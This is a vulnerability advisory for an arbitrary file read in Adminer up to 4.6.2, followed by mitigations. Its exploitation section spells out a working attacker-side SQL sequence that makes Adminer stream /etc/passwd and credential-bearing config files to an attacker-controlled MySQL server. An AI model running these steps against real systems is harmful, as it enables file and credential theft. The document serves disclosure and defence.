CVE-2021-43008 - Adminer - Arbitrary file read

Jul 17, 2021   
Tags: cve, unauthenticated, web


Summary

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server hosting Adminer. The attacker logs in through Adminer's own login form using a remote MySQL server they control, then issues a LOAD DATA LOCAL INFILE statement: since that statement is executed by the MySQL client side (the PHP process on the Adminer host), the file is read from the Adminer server's filesystem and sent to the attacker's database. No account on the legitimate database is required, only access to the login page.

Affected products

All Adminer versions up to and including 4.6.2 are vulnerable; 4.6.3 and later contain the fix.

[Figure: Adminer vulnerable versions]

Exploitation

In order to exploit this vulnerability, an attacker needs to reach the login page of Adminer and make it connect back to a remote MySQL server they control. Adminer's login form accepts an arbitrary server host (and port), so the attacker simply enters the address of their own MySQL server together with a valid account on it:

[Figure: Adminer login form pointing at the attacker's MySQL server]

Once logged in, the attacker opens the "SQL command" page of Adminer:

[Figure: Adminer "SQL command" page]

The following statement makes the MySQL client library running inside Adminer's PHP process open a local file on the Adminer host and stream its contents into a table on the attacker's remote database. The file is read with the privileges of the web server user, which bounds what can be exfiltrated; the target table must already exist on the attacker's server:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE lfr_sink_table FIELDS TERMINATED BY "\n";

Once this is done, the attacker can view the contents of the file, one line per row, with SELECT * FROM lfr_sink_table;:

[Figure: contents of /etc/passwd returned by SELECT * FROM lfr_sink_table]
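The complete attacker-side sequence, as an added example that is not part of the original advisory: the preparation run directly on the attacker-controlled MySQL server (database, account and sink table), followed by the two statements issued through Adminer's "SQL command" page. The database name `lfr`, the account `adminer`/`hunter2` and the column name `line` are assumptions chosen for the example; `lfr_sink_table` is the table name used above.

```sql
-- === Run on the attacker-controlled MySQL server, before logging in to Adminer ===

-- LOAD DATA LOCAL is refused unless the *server* allows it (local_infile defaults
-- to OFF on MySQL 8.0); the attacker controls this server, so they enable it.
SET GLOBAL local_infile = 1;

-- Database, account and privileges that will be typed into Adminer's login form.
-- (Names and password are assumptions for this example.)
CREATE DATABASE IF NOT EXISTS lfr;
CREATE USER IF NOT EXISTS 'adminer'@'%' IDENTIFIED BY 'hunter2';
GRANT ALL PRIVILEGES ON lfr.* TO 'adminer'@'%';
FLUSH PRIVILEGES;

-- Sink table: one TEXT column, one row per line of the exfiltrated file.
USE lfr;
CREATE TABLE IF NOT EXISTS lfr_sink_table (line TEXT);

-- === Issued from Adminer's "SQL command" page, after logging in as adminer@<attacker host> ===

-- The path is resolved on the Adminer host by the MySQL client library (PHP mysqli/mysqlnd),
-- not on the attacker's server: the PHP process opens /etc/passwd and streams it to the server.
-- Each line becomes one row because the field and line terminators are both "\n".
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE lfr_sink_table FIELDS TERMINATED BY "\n";

-- Read the file back. This can be run either from Adminer or directly on the attacker's server.
SELECT line FROM lfr_sink_table;

-- Swap the path to target other files readable by the web server user, e.g. application
-- configuration holding database credentials; the sink table is reused, so truncate it between reads.
TRUNCATE TABLE lfr_sink_table;
```

Two conditions must hold for the transfer to succeed: the attacker's server must accept LOAD DATA LOCAL (the `local_infile` variable above), and the MySQL client in Adminer's PHP process must be willing to send local files, which is governed by the `mysqli.allow_local_infile` php.ini directive on the Adminer host. If either side refuses, the statement fails with an error rather than returning data.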

Mitigations

In order to fix this vulnerability, update Adminer to the latest version, or at least to a version >= 4.6.3, where the vendor addressed the issue by disabling LOAD DATA LOCAL INFILE on the connection Adminer opens. As defence in depth, do not expose the Adminer login page to untrusted networks, restrict the servers Adminer is allowed to connect to (for example with the login-servers plugin shipped with Adminer, or with egress filtering on the web host), and set mysqli.allow_local_infile=0 in php.ini so the PHP MySQL client refuses to send local files regardless of the application.
